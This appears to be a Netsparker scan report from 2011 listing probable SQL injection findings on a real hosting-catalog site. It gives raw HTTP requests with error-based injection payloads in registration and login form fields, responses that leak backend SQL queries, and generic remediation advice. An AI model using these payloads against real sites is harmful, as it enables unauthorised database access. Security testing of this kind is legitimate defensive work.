POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 718 Accept-Encoding: gzip, deflate company_name='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:20:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 354 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE company_name=''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 699 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:22:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:0' for key 1 in SQL SELECT account_id FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
temp_check
POST
755
user_login
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
password
POST
3
form_field
POST
1
5.0.77
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 323 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&password=3&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:29:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 383 Error #1062: Duplicate entry '_!@4dilemma:0' for key 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' AND active NOT IN (2,3,4)
Parameters
Parameter
Type
Value
temp_check
POST
755
user_login
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
password
POST
3
remember_both
POST
1
remember_mail
POST
1
form_field
POST
1
5.0.77
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 355 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&password=3&remember_both=1&remember_mail=1&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:35:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 383 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' AND active NOT IN (2,3,4)
Parameters
Parameter
Type
Value
temp_check
POST
755
user_login
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
password
POST
3
B1
POST
Login
form_field
POST
1
5.0.77
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 332 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&password=3&B1=Login&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:40:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 383 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' AND active NOT IN (2,3,4)
[Probable] SQL Injection
[Probable] SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it
could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.
Impact
Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
See the remedy for solution.
If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping ). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries )
Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.
A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements ). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
Parameters
Parameter
Type
Value
id
GET
'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
Request
GET /banner.php?id='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ptafq9e5a5qh52n7lhsaof9ea6; time_0=1303646197; user_counted_0=1%3CAND%3E%3CAND%3E24%3CAND%3E66%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65%3CAND%3E77%3CAND%3E26%3CAND%3E29%3CAND%3E28 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:23:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 510 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '柡D!����b���io�a")́�~H�v7P"M�x7��Ķr�����1N:�@�' AND a.active = 0 ' at line 6 in SQL SELECT COUNT(b.banner_aff_id) FROM banner_aff AS b LEFT JOIN affiliate AS a USING(aff_id) WHERE b.hash_code='' AND b.banner_aff_id='�^�!�'柡D!����b���io�a")́�~H�v7P"M�x7��Ķr�����1N:�@�' AND a.active = 0 AND b.status = 'active'
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 670 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 448 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +''
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 651 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 443 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +''
Parameters
Parameter
Type
Value
B1
POST
Login
form_field
POST
1
password
POST
3
remember_both
POST
1
remember_mail
POST
1
temp_check
POST
755
user_login
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 267 Accept-Encoding: gzip, deflate B1=Login&form_field=1&password=3&remember_both=1&remember_mail=1&temp_check=755&user_login='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:58:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 477 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +'' AND active NOT IN (2,3,4)
Parameters
Parameter
Type
Value
company_name
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 631 Accept-Encoding: gzip, deflate company_name='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:16:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 448 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 612 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:18:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 443 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 648 Accept-Encoding: gzip, deflate 